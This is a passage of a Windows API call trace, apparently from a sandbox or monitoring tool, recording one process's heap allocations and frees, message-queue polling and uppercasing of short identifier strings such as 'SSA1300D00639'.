hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.768] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.769] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.770] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0206.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1848 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.771] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.771] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.772] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.772] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.773] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.773] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.774] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.774] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.774] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.774] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.775] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.775] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.775] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.776] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.777] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.779] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.779] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0206.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.779] RtlAllocateHeap 